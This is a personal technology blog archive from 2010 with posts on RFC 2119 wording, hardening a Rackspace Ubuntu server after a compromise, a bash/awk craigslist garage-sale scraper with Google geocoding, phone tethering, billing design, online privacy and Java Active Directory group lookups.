The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT", "SHOULD", "SHOULD NOT", "RECOMMENDED", "MAY", and "OPTIONAL" in this document are to be interpreted as described in RFC 2119 [34].

If we chase down RFC 2119

1. MUST This word, or the terms "REQUIRED" or "SHALL", mean that the
definition is an absolute requirement of the specification.

2. MUST NOT This phrase, or the phrase "SHALL NOT", mean that the
definition is an absolute prohibition of the specification.

3. SHOULD This word, or the adjective "RECOMMENDED", mean that there
may exist valid reasons in particular circumstances to ignore a
particular item, but the full implications must be understood and
carefully weighed before choosing a different course.

4. SHOULD NOT This phrase, or the phrase "NOT RECOMMENDED" mean that
there may exist valid reasons in particular circumstances when the
particular behavior is acceptable or even useful, but the full
implications should be understood and the case carefully weighed
before implementing any behavior described with this label.

Then in the http spec we see:
Clients that use persistent connections SHOULD limit the number of simultaneous connections that they maintain to a given server. A single-user client SHOULD NOT maintain more than 2 connections with any server or proxy. A proxy SHOULD use up to 2*N connections to another server or proxy, where N is the number of simultaneously active users. These guidelines are intended to improve HTTP response times and avoid congestion.


Whats my problem?
  • If someone has taken the time to formally define things in a certain context, it is professionally irresponsible to change the meaning of their statements.
  • If you are distributing technical documentation, make sure you have your facts right and use unambiguous language. Remember, not everyone speaks English as their native language, nor do they necessarily have the inclination to go chase down quoted sources.
  • If you are trying to cite documentation, chase down the originator, don't rely on second, third, fourth, or nth parties to give you your information unless you REALLY trust them

Lets dissect a portion of the original quote:

Connections to a single HTTP 1.1 server are limited to two simultaneous connections.

Which of the following statements does this concretely assert?
  • An HTTP server will not accept more than two simultaneous connections.
  • An HTTP server might accept only two connections or might accept more
  • Clients can not make more than two simultaneous connections to the same server
  • Clients can actually make more than two simultaneous connections, but we've limited them to two

For the lay person (other than perhaps lawyers), these distinctions probably seem like minute and petty semantic wrangling. For professional software developers they are, however, terribly important.

Why? Because computers don't exactly do what you want them to do, they do exactly what you tell them to do.

Reread that a couple of times please...

Any subjective interpretation you are expecting the computer to do on your behalf does NOT happen and anybody who's used a computer has probably run into problems where the computer is not doing what you want and you are unable to understand why. There are millions of lines of code you are interacting with and their behavior is often specified with ambiguous language like the original paragraph. More importantly, they are restated and modified via the "telephone game" effect such that original and same requirements are completely lost

Monday, August 16, 2010

Secure your rackspace cloud server

OK, so I've went round and round trying to figure out how my rackspace server was compromised and have come to the conclusion it was an inside job, but nobody's fessing up. I can see what sort of package was used to compromise my box and I may come back to trying to poison that package, but there isn't enough time in my life to continue to school folks who are hell bent on screwing with other people's property.

Instead, I'll give folks a quick primer one how to have a little better security if you choose to use rackspace with ubuntu 10.04.

#1 make sure your rackspace console password is secure... some basic rules: 10 chars, no dictionary words, upper and lower case letter, 2 number, at least one special char.
#2 Once you get your root password emailed to you, log in via the secure console, and disable both network interfaces. I'm not sure what the 10.* interface is for, I'll figure that out later, but I'm assuming it's some sort of rackspace backchannel.
#3 Change the root password to something secure (NOT your console password).
#4 Disable root login via ssh
#5 reenable networking.

At a minimum, someone must now guess a user account, a user password, AND the root password. to get root access to your machine (assuming you don't do something really stupid like installing random linux rootkit because your "friend" said it was kewl warez).

This should get you to a reasonably safe place to start with.

Note, if you want to ssh directly to your box, create a new user account (with a secure password) and you can do direct ssh and still be fairly secure. Adding user to sudoers has the effect if giving root with 1 password (although it is theoretically still more secure if you have a difficult to guess userid).

Saturday, August 7, 2010

Cloud Computing Gotchas part II

I finally had time to site down and actually analyze what happened to my box. It was certainly compromised by a script kiddie, but I'm not 100% sure if it was an inside job or not. In any event, I stored off the broken image and re-imaged the machine back to my "last known good" configuration.

I subsequently added the account that I thought was used for the attack setting the password back to what it was when the machine was originally compromised, but limited login to the rssh shell. This has been running for almost a week with no problems now. I've had a couple of sniffs of folks trying to connect to my machine as root, but no solid hits.

Some initial observations:

First the default install of Ubuntu Server on rackspace's cloud accounts enables root login via ssh. This is very strange now that I think about it. Ubuntu, by default disallows this (for very good reasons), and I think rackspace should seriously consider a change to their default build.

Second, the root password is emailed to customers. Again, really bad idea, not only is email really insecure, but there is certainly a more convenient method. Only display the password on the ssl admin console and push the responsibility of maintaining a good password policy to the customer.

Third, Not only should the root account ssh login be disabled by default, but users should have an option to have the initial boot of the system start the network interfaces disabled. I really would like to build a secure image, but it's nearly impossible when the server is started with network interfaces enabled.

So at this point, Rackspace's cloud accounts are exposing their customers to multiple attack vectors with zero chance of allowing the customer to secure their machine BEFORE an attacker has already breached their system. These are actually pretty minor changes to policy and configuration that have serious implications for security.

Saturday, July 31, 2010

Cloud Computing Gotchas

I've been using Rackspace cloud for testing some server builds and ESB solutions and recently ran into a "gotcha". First off, it looks like maybe the machine was compromised... I HOPE it was an inside job by one of my developer "friends" who happened to know the userid/password. If not, that means the default install of ubuntu 10.04, apache tomcat6, apache2.2, and servicemix is able to be compromised in less that 3 days when left out on the internet.

In any event, that particular problem notwithstanding, I now have a different problem... That is, rackspace has suspended my account and I cannot access my server, nor create another one until Monday. Thank god I was only using this machine to test things, I can't image what I would have done if I was actually depending on it to be running.

Another problem I'm finding is that I cannot find any reference on Rackspace's web site about acceptable use. They suspended the account for outbound ssh activity which is pretty silly considering any sane server admin uses ssh for EVERYTHING. I'm a little concerned because without ssh capability, I don't really have a good secure option to connect to any other server.

Worse yet, I cannot access my log files, server images, or any other information to try and discover what happened. While they claim "fanatical customer service", I'm a bit disappointed that I have to wait 48 hours to get information about a problem with legal implications. It seems like it would be pretty simple to let me see at LEAST my log files as well as get some information about WHO thinks I'm hacking. As it stands it sounds like all I need to do is call rackspace and complain and they will disable an account.

Wish me luck on Monday, I'm really curious about what actually happened here.

Sunday, July 18, 2010

garage sales part two (geocoding and rendering)

Early Results

Here are some early results:

Port Huron, MI
Rockford, IL

These maps show the first page of garage sales on craigslist with about a 50% accuracy rate (meaning, only about 1/2 of time can I find an address). That having been said, it's still pretty impressive as manually entering these things into google maps is.... tedious. This process takes about 60 seconds per city using the script I've written.

Back to Geocoding

Note, geocoding is the process of attaching geographic coordinates to data. In my case I can find a "reasonable" address in about 1/2 of the entries. This means there is a string somewhere that looks like an address, notably, it has a few numbers, and then a couple of words.

To get this data and geocode it, I wrote an awk script
$1 ~ /\([0-9]+ .+\)/ {match($1,/([0-9]+ [^\)\(]+)\)/,out); printdata( "\""out[1]"\"")}
$1 !~ /\([0-9]+ .+\)/ && $2 ~ /[0-9]+ [a-zA-Z]+ [a-zA-Z]+ /{match($2,/([0-9]+ [a-zA-Z]+ [a-zA-Z]+)/,out); printdata( "\""out[1]"\"")}
function printdata (mydata) {
curl = "/usr/bin/curl -s \"http://maps.google.com/maps/api/geocode/xml?address=" gensub(" ","%20","g",substr(mydata,2,length(mydata)-2)) ",+Port+Huron,+MI&sensor=false\" | /usr/bin/xmlstarlet tr geocode.xsl"
curl | getline loc
markers = markers "|" loc
close(curl)
print mydata",\""gensub("\"","\"\"","g",$2)"\","loc
}

What this script does is use a regular expression match to find rows in the data that look like addresses, replace spaces with %20, then send a geocoding request to http://maps.google.com/maps/api/geocode/xml, take those xml results, use an xslt to extract the latitude,longitude coordinates, then reoutput the rows with the latitude and longitude tagged on the end of the row.

What I'm left with in my output2.csv file is some data that looks like this:

name,description,latitude,longitude
"603 N 3RD ST, ST CLAIR","Yard Garage Estate Sale....July 8 Thursday to July 11 Sunday...9AM to 6PM....We have Antiques, Tools, Furniture, Tons of stuff for EVERYONE...We plan on having a BAG SALE on Sunday with whats left....But be there before then for best choices!!!!!",42.9741483,-82.4225020


As it turns out google has an api to take a file just like this and build a nice little map. I post to this api and out comes a pretty map.
The final product:
Main shell script

#!/bin/bash
rm -f *.html
rm -f *.xml
rm output.csv
wget -q -O craig1.xml - "http://porthuron.craigslist.org/search/?areaID=223&subAreaID=&query=garage+sale&catAbb=sss"
hxwls craig1.xml | grep http.*\.html | wget -i -
for f in *.html; do tidy -q -utf8 --quote-nbsp no --doctype omit --output-xml yes $f | xmlstarlet tr ripper.xsl | sed 's/PostingID: //' >> output.csv; sleep 1s; done;
cat output.csv | gawk -F \",\" -f go.awk > output2.csv
curl -X POST -H "GData-Version: 2.0" -H "Content-type: text/csv" -H "Authorization: GoogleLogin auth=\"secret key you get from google"" -H "Slug: port huron craigslist garage sales" --data-binary @output2.csv http://maps.google.com/maps/feeds/maps/default/full


Additional awk stuff

BEGIN { markers =""; print "name,description,latitude,longitude"}
$1 ~ /\([0-9]+ .+\)/ {match($1,/([0-9]+ [^\)\(]+)\)/,out); printdata( "\""out[1]"\"")}
$1 !~ /\([0-9]+ .+\)/ && $2 ~ /[0-9]+ [a-zA-Z]+ [a-zA-Z]+ /{match($2,/([0-9]+ [a-zA-Z]+ [a-zA-Z]+)/,out); printdata( "\""out[1]"\"")}
function printdata (mydata) {
curl = "/usr/bin/curl -s \"http://maps.google.com/maps/api/geocode/xml?address=" gensub(" ","%20","g",substr(mydata,2,length(mydata)-2)) ",+Port+Huron,+MI&sensor=false\" | /usr/bin/xmlstarlet tr geocode.xsl"
curl | getline loc
markers = markers "|" loc
close(curl)
print mydata",\""gensub("\"","\"\"","g",$2)"\","loc
}
#END {print markers}


Wrapup

One thing I'll note. While this certainly works, there are only a few people I've ever met who will be able to figure it out. I'm ultimately probably better off switching to Ruby/Python/Groovy at some point, but I wanted to get something working first.

Some of the problems I had with these tools are that they don't just "work"... for example, to fetch the url via groovy, I started with this code snippet

def http = new groovyx.net.http.HTTPBuilder( 'http://rockford.craigslist.org' )
http.{ uri.path = '/search/?areaID=223&subAreaID=&query=garage+sale&catAbb=sss'
response.success = { resp, xml -> xml.responseData.results.each {
println " ${it.titleNoFormatting} : ${it.visibleUrl}"
} } }


My first problem was that my classpath was somehow screwed up and I couldn't get this to compile. In addition, even when I do get it to work, it's much more complicated than the command line equivalent:

wget -q -O craig1.xml - "http://porthuron.craigslist.org/search/?areaID=223&subAreaID=&query=garage+sale&catAbb=sss"


Why would I want to write all the gobbldy-gook at the top (that adds NO value) when the bottom version just works? If I get energetic, I'll probably start to port this to groovy once I get it working better as I believe this will be more compatible with my ultimate platform (android).

Saturday, July 17, 2010

Garage sale maps

The Backstory

My wife is an avid garage sailer. She finds garage sales she thinks have promise, then cruises by them to see if there is anything of interest. She is so accomplished at this that she routinely turns a profit by snagging things that folks didn't realize had resale value, and flipping them at local consignment shops. While this doesn't pay the bills, it DOES provide enough extra cash to actually have her garage sailing at least pay for itself with a little left over.

This is, however, not without it's share of problems:

First, the postings online (or paper) for garage sales are scattered to the four winds. At this point, craigslist.org is the hands down winner for quality and quantity of posts. Local newspapers/classified also have a good quantity, but the few sites I found on google geared toward this are suffering terribly from a strategic chicken and egg problem.

Second, while craigslist has a fairly high quality set of sales established, it has no functionality to map these things so you're on your own. Our current process is to plug through each one, look at the address, plug the address into google maps (or the gps), then lather rinse repeat.

The Idea


Enter the programmer husband, I saw what she was doing and said "I can do better with some software". My ultimate vision was to have a location aware android application that could tell one the nearest 5 garage sales that have "interesting" things as well as an online application to solve the obvious traveling salesmen problem. While getting to this (nobel? foolish?) goal involves solving a huge number of other problems, without a good solution to the first two mentioned above, everything else is secondary.

In order to solve the "chicken and egg" problem, I simply told myself "she's using craigslist as her primary source of information". Problem solved... yes, she's probably missing hundreds if not thousands of sources of garage sales, but since she had already been using craigslist as the primary source, I couldn't see any reason to change that. As a small caveat, since we did need to do some interpretation of the data from CL, it turns out I had to build an intermediate data format anyway. This means the input data is pluggable and we aren't necessarily bound to CL as the sole source of information.

For the "mapping" problem, my initial reaction was to use google maps. I already happened to understand the web apis and it's fairly easy to use. While there may be a hundred other tools that might do the job, I didn't even really look for alternate solution.

The build Part 1


From a solution design perspective, I am not a big fan of boiling the ocean. This type of solution is really only a good idea if you're a consultant who is being paid to come up with a brilliant idea... it's not so good for a schmuck who's trying to build something useful.

To that end, I reached into my toolbox and asked myself "I know python, ruby, and java all have html processing tools, which should I use?". My initial guess was to use ruby, hpricot and rubyful soup are both very capable screen scraping/html processing tools and showed early promise. In practice, it took a few hours with both to get them working and they where just a bit more clunky that I was looking for.

After an hour or so, I switched to Python. The advantage python seemed to have was that the html/http stuff was built right in. I've used python and jython in the past for screen scraping mainframe systems and was actually kicking myself for not remembering this and using it as my first choice. My initial enthusiasm began to wane quickly as I realized the slightly odd nature with which the CL pages where formatted was difficult to process using the default HTML parser.

I then went to java (actually groovy) and made what I would admit is an almost halfhearted attempt at the problem. By this point I was a bit disheartened because I had spent the better part of the day trying this stuff out and every time I changed tools my IDE (eclipse) would require a bunch of reconfiguration to get everything working properly. In addition, the package management and syntax of all these things where so radically different that I had to spend time googling and mentally changing gears to get started again.

At this point I took a break and didn't resume until the next weekend. The next weekend I took a totally different approach. Instead of relying on "programming" languages, I asked myself the question "what is the simplest possible way to get and extract this content?".

My answer: bash.

Enter Bash

When I sat back down the following week I realized that in my search for utility packages in various languages I had been struggling with a couple of problems. First off the software in Ruby/Python/Groovy (RPG) was not really geared for text processing or html processing. They were more like swiss army knives that I could get Yet Another Plugin (YAP) to do what I wanted. This in my head I heard the late night infomercial huckster say "But wait, there's more..."

What I had been ignoring is that while developing the RPG solutions, I was actually using command line utilities to verify the code was working problem. DOH!

So, simply put I took my existing wget command line and used that to extract the html for the posts.

wget -q -O craig1.xml - "http://rockford.craigslist.org/search/?areaID=223&subAreaID=&query=garage+sale&catAbb=sss"


Then walk the links with hxwls and pull them down. While I know this could have been a one step process, but I'm was using the intermediate files for troubleshooting.

hxwls craig1.xml | grep http.*\.html | wget -i -

At that point I had a set of html files on my drive that I was using to try and extract content. My first step was to change them into xml, then use an xslt to convert them into flat files.
html tidy seemed a good choice for cleaning up the html

tidy -q -utf8 --quote-nbsp no --doctype omit --output-xml yes


Use xmlstarlet to do the xslt

xmlstarlet tr ripper.xsl


The ripper.xsl consisted of the following:


<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="text"/><xsl:template match="/">"<xsl:value-of select="normalize-space(//h2)"/>","<xsl:for-each select="//div[@id='userbody']"><xsl:value-of select='normalize-space(text())'/>","<xsl:value-of select="normalize-space(following::text())"/></xsl:for-each>"
</xsl:template></xsl:stylesheet>



A little bit of sed to extract the posting id

sed 's/PostingID: //'



Put it all together:


for f in *.html; do tidy -q -utf8 --quote-nbsp no --doctype omit --output-xml yes $f | xmlstarlet tr ripper.xsl | sed 's/PostingID: //' >> output.csv; done;


At this point I was pretty satisfied with the resulting csv file. In a couple of hours I had a working solution that was simple (if not a big opaque). The output.csv had posting id, a subject, and a bunch of textual data about the posting. It was ready to be imported to mysql, geocoded, or whatever other things I needed to have happen.

The entire program was two files (an xsl) and one or two lines of a bash script all pipelined together:


!/bin/bash
wget -q -O craig1.xml - "http://rockford.craigslist.org/search/?areaID=223&subAreaID=&query=garage+sale&catAbb=sss"
hxwls craig1.xml | grep http.*\.html | wget -i -
for f in *.html; do tidy -q -utf8 --quote-nbsp no --doctype omit --output-xml yes $f | xmlstarlet tr ripper.xsl | sed 's/PostingID: //' >> output.csv; done;


In my Next Post, geocoding this info and building a map.


Examples of useless garage sale sites that will never succeed

Monday, June 28, 2010

tether droid eris to Ubuntu 10.04 machine

My internet service provider is a bit dicey and I occasionally need to be on the Internet even when they are figuring out how to reboot their remote router when they lose connectivity. So I thought I would just tether my smartphone (Droid ERIS) to my computer. After a bit of searching, I came up with a couple requirements.
  1. I didn't want to root my phone. While this is technically a cool thing to do, I just don't want to do that right now.
  2. I need to be able to connect natively to an Ubuntu linux machine. All my computers are currently running ubuntu and I didn't want to screw around with wine or a virtual machine.

Enter easytether. In 5 minutes I had internet connectivity... here's what I did:
  1. downloaded easytether
  2. downloaded the ubuntu driver to the phone
  3. connected the phone to the computer (via usb)
  4. installed the .deb located in phone's download folder
  5. ran easytether on the phone
  6. ran "easytether enumerate" on my computer
  7. ran "sudo dhclient easytether0" on my computer


I'm impressed! What's more telling (aside from this just working) is that there is not yet a Mac version, but there is both a 32 and a 64 bit Ubuntu package. It makes me wonder exactly how many Ubuntu users there really are and how long until it surpasses the Mac market.

Speed results:
Last Result:
Download Speed: 674 kbps (84.3 KB/sec transfer rate)
Upload Speed: 635 kbps (79.4 KB/sec transfer rate)

Sunday, June 27, 2010

My verizon bill

Here's a copy of my verizon bill:
verizon

My first reaction is "Hey, I don't owe anything"... However, from experience I think I DO, and I think it might be $127. Unfortunately, by putting a big $0 for my balance at the top, people generally are going to stop and simply assume they didn't owe anything.

I've called Verizon about this a few times and 2/3 times the person I talk to ALSO thinks that I don't owe anything. I then need to talk them through my billing history for 15 minutes before they realize I DO in fact owe something. Usually this is after a supervisor gets involved and starts trying to explain complicated billing cycles and all sort of things that neither I nor the CSR actually care to know anything about.

This is how NOT to design an online bill presentation screen, they've taken intimate knowledge about how their internal billing and accounting systems work and broadcast it all the way to the customer. In addition to frustration, this causes confusion and wasted time/money/effort.

On the plus side, I wonder how many millions of dollars per month verizon makes because confused customers try to pay their $0 bill and end up being late for the $127 they actually owe.

Saturday, June 19, 2010

What should I post online?

As a guy with a reputation of knowing something about computers, I often get hit up for tech advice from folks. Recently, a cousin of mine sent me a note asking about what sorts of things I post online and what I don't. Evidently he had been aware of a situation where kids used information from spokeo.com to commit crimes.

Personally, I think this is pretty interesting and a really good question. I say this because I think a lot of non-tech folks have not yet made the transition from "off line" to "online". Many technical people have already had to deal with this (often years ago), but many younger folks and/or non-technical people are just beginning to understand the implications of being truly "online". For example, here is a post from 7 years ago by some buffoon (that's me) who decided a to post an off topic friday afternoon 833r discussion. This will likely be available for a very very long time.

From my perspective, this is a pretty good example of how information wants to be free. That is, once you start putting information on the internet, you lose control of it. This means things on the internet (text, photos, videos) can be taken out of context and used for other purposes. In addition, depending on what you put out there, criminals might be able to gain enough information to do BAD things. In this particular situation (7 years ago) I was in our data center at one point and after I introduced myself this guy said "oh so YOU'RE Mike Mainguy". Evidently, because I was posting a lot of messages in user groups with my work email address, spammers where scanning the user groups and bombarding our domain with email to my account. At one point I believe I was told that my account was receiving more spam than any other account in the domain except for the CEO.

As another example, suppose I had posted on facebook that I was going on vacation for 2 weeks. This would mean that anybody who searched facebook for vacation, potentially would potentially be able to see it. This then would have an unintended side effect of telling every tech savvy criminal in the world that they would have a golden opportunity to break into my house. If prior to that, I had posted a facebook note about my new
plasma TV
, I'd have then put myself into a potentially vulnerable situation.

Don't get me wrong, the internet is bringing the world together and this is a wonderful thing. Social networking and other new applications enabling us to connect globally and interact across time and space in unimaginable ways. I obviously think that sharing information is a good thing and encourage everyone to get online and actively maintain an online presence. As with anything, however, there are unintended and potentially negative consequences of this. Folks who have newly minted online identities simply need to think about how they present themselves online.

Personally, before posting online, I typically ask myself the following questions:
  • "Would I be ashamed if my mom saw this?"
  • "Could a criminal use this information to do something bad?"
  • "Would a future employer potentially use this against me?"
If I answer "Yes" to any of these criteria, I typically don't post it. Obviously there are other considerations, but these three simple rules seem to serve me pretty well.

Sunday, June 13, 2010

Active Directory Authorization with Java

I have a situation where I need to be able to have sub groupings of users in Active directory to manage who can see particular pieces of information. It turns out this is easy, but unintuitive. An important detail is to realize that groups can be put inside into other groups and you can use the "member" and "memberOf" attributes to determine who is in which group. So if you have an OU in Active directory called "OU=web,DC=mainguy,DC=org" and you create a group with a name of "CN=Germany National Sales,OU=web,DC=mainguy,DC=org". From here in Active directory you create any number of subgroups and put them in the parent group (under the same OU in our example, but that's not necessary).

At this point, you can dump users into any of the groups and you can get segregate users into nested structures. With a little creativity you can use recursion to have deeper nesting (not necessarily a good thing) as well as a "deny/allow" capability (perhaps based on ou).

In any event, here's the code that can get you started.


package org.mainguy;

import java.util.Hashtable;

import javax.naming.AuthenticationException;
import javax.naming.Context;
import javax.naming.NamingEnumeration;
import javax.naming.NamingException;
import javax.naming.directory.Attribute;
import javax.naming.directory.Attributes;
import javax.naming.directory.SearchControls;
import javax.naming.directory.SearchResult;
import javax.naming.ldap.Control;
import javax.naming.ldap.InitialLdapContext;
import javax.naming.ldap.LdapContext;

class FastBindConnectionControl implements Control {
 public byte[] getEncodedValue() {
  return null;
 }

 public String getID() {
  return "1.2.840.113556.1.4.1781";
 }

 public boolean isCritical() {
  return true;
 }
}

public class LDAPBinder {
 public Hashtable env = null;
 public LdapContext ctx = null;
 public Control[] connCtls = null;

 public LDAPBinder(String ldapurl) {
  env = new Hashtable();
  env.put(Context.INITIAL_CONTEXT_FACTORY,
    "com.sun.jndi.ldap.LdapCtxFactory");
  env.put(Context.SECURITY_AUTHENTICATION, "simple");
  env.put(Context.PROVIDER_URL, ldapurl);

  connCtls = new Control[] { new FastBindConnectionControl() };

  try {
   ctx = new InitialLdapContext(env, connCtls);
        
  } catch (NamingException e) {
   System.out.println("Naming exception " + e);
  }
 }

 public boolean authenticate(String username, String password) {
  try {
   ctx.addToEnvironment(Context.SECURITY_PRINCIPAL, username);
   ctx.addToEnvironment(Context.SECURITY_CREDENTIALS, password);
   ctx.reconnect(connCtls);
   System.out.println(username + " is authenticated");
      return true;
  }

  catch (AuthenticationException e) {
   System.out.println(username + " is not authenticated");
   return false;
  } catch (NamingException e) {
   System.out.println(username + " is not authenticated");
   return false;
  }
 }

 public void finito() {
  try {
   ctx.close();
   System.out.println("Context is closed");
  } catch (NamingException e) {
   System.out.println("Context close failure " + e);
  }
 }

 public void getMembership(String name) {
  String[] returns = {"member"};
  SearchControls sc = new SearchControls();
  sc.setSearchScope(SearchControls.SUBTREE_SCOPE);
  sc.setReturningAttributes(returns);
  try {
   NamingEnumeration ne = ctx.search("OU=web,DC=mainguy,DC=org","memberOf="+name,sc);
   
   while (ne.hasMoreElements()) {
    SearchResult sr = (SearchResult)ne.next();
    System.out.println("+" + sr.getName());
    
    Attributes attr = sr.getAttributes();
    System.out.println("--" + attr.get("member").size());

    NamingEnumeration allUsers = attr.get("member").getAll();
    
    while (allUsers.hasMoreElements()) {
     String value = (String)allUsers.next();
     System.out.println("---"+value);
     
    }
        
   }
  } catch (Exception e) {
   e.printStackTrace();
  }
 }
 /**
  * @param args
  */
 public static void main(String[] args) {
  LDAPBinder binder = new LDAPBinder("ldap://173.203.66.30:389");
  binder.authenticate("maxplanck@mainguy.org", "supersecret");
  binder.getMembership("CN=Germany National Sales,OU=web,DC=mainguy,DC=org");

  binder.finito();
 }

}

Saturday, June 12, 2010

Why windows is useful in the cloud

OK, I realize from a previous post that it in a previous post it may seem like I think that windows is completely non-functional in a cloud environment.

Let me back up a little...

From my perspective, running production servers on virtual machines spun up on demand is not useful (yet) with the windows operating system. The windows OS strategy is just not responsive enough to this sort of business requirement (yet).

That having been said, I just finished spinning up a windows 2003 server instance on rackspace... Why? I need to investigate some Active Directory problems we're trying to solve at work right now. I spent 4 hours downloading the massive DVD install image (and a bunch of crazy MS registration stuff) for a 10 day TRIAL version of the OS.

I then went over to my rackspace account (because of a different problem) and realized they could set up the server I needed. I clicked "create server" and they set up a virtual server in 15 minutes. Yes, it costs more to run this server than my Ubuntu instances, but it's only going to run for a couple of hours over the next 2 days so I don't really care.

In short, on-demand virtual windows machines (I'd love some XP/Vista/Windows 7 instances for testing our software hint hint) are a super useful thing and are worth their weight in gold (maybe even platinum), but this doesn't mean it's a good distributed virtual server platform.

Thursday, June 3, 2010

firefox 3.6 and google chrome

I happened to notice that mygopher.com doesn't seem to work properly with firefox 3.6 OR google chrome... That's about 25-50% of "normal" web traffic. Note: if the techie people show you log files that indicate firefox is really only 5% (or some other low number).... ask them "how could ANYONE with firefox possibly be using the site if it doesn't actually WORK with firefox?".

I used to be a little self conscious about posting gripes about browser compatibility, but now that I see the real numbers from a number of sites that get millions of hits, I'm fairly confident that firefox (and even crome) are actually pretty important at this point. Right now I support a couple of non-technical sites that get millions of hits per month and IE gets around 70% firefox gets around 20% and chrome gets around 5% (the rest is a mixed bag).

I'd recommend letting the tech folks take about a week and make the site at least work with these browsers. In all fairness, I guess it is possible that the site works on windows versions of chrome and firefox as I'm using linux, but I suspect it's equally broken on windows. At this point, cross browser compatibility is a commodity and no professional organization should really allow incompatibility on a public site (IMHO).